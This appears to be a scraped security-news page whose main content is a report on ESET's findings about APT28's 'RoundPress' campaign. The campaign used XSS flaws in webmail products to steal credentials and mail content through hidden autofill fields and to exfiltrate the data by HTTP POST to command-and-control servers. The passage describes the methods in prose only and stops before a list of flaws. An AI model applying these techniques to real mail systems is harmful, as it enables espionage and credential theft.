Computer Forensics Company: Computer Forensics Company: Cyber security has been everything from a tick-box exercise to a compliance headache for organisations – but the pressing threats we face mean cyber resilience must become a boardroom issue By Dax Grant Published: 11 Jun 2025 Cyber security has long been the concern [...]
Digital Forensics:
Hackers are running a worldwide cyberespionage campaign dubbed ‘RoundPress,’ leveraging zero-day and n-day flaws in webmail servers to steal email from high-value government organizations.
ESET researchers who uncovered the operation attribute it with medium confidence to the Russian state-sponsored hackers APT28 (aka “Fancy Bear” or “Sednit”).
The campaign started in 2023 and continued with the adoption of new exploits in 2024, targeting Roundcube, Horde, MDaemon, and Zimbra.
Notable targets include governments in Greece, Ukraine, Serbia, and Cameroon, military units in Ukraine and Ecuador, defense companies in Ukraine, Bulgaria, and Romania, and critical infrastructure in Ukraine and Bulgaria.
The attack starts with a spear-phishing email referencing current news or political events, often including excerpts from news articles to add legitimacy.
A malicious JavaScript payload embedded in the HTML body of the email triggers the exploitation of a cross-site scripting (XSS) vulnerability in the webmail browser page used by the recipient.
All that is needed from the victim is to open the email to view it, as no other interaction/clicks, redirections, or data input is required for the malicious JavaScript script to execute.
The payload has no persistence mechanisms, so it only executes when the malicious email is opened.
The script creates invisible input fields to trick browsers or password managers into autofilling stored credentials for the victim’s email accounts.
Additionally, it reads the DOM or sends HTTP requests to collect email message content, contacts, webmail settings, login history, two-factor authentication, and passwords.
The data is then exfiltrated to hardcoded command-and-control (C2) addresses using HTTP POST requests.
Each script has a slightly different set of capabilities, adjusted for the product it’s targeting.
Operation RoundPress targeted multiple XSS flaws in various webmail products that important organizations commonly use to inject their malicious JS scripts.
The exploitation ESET associated with this campaign involves the following flaws: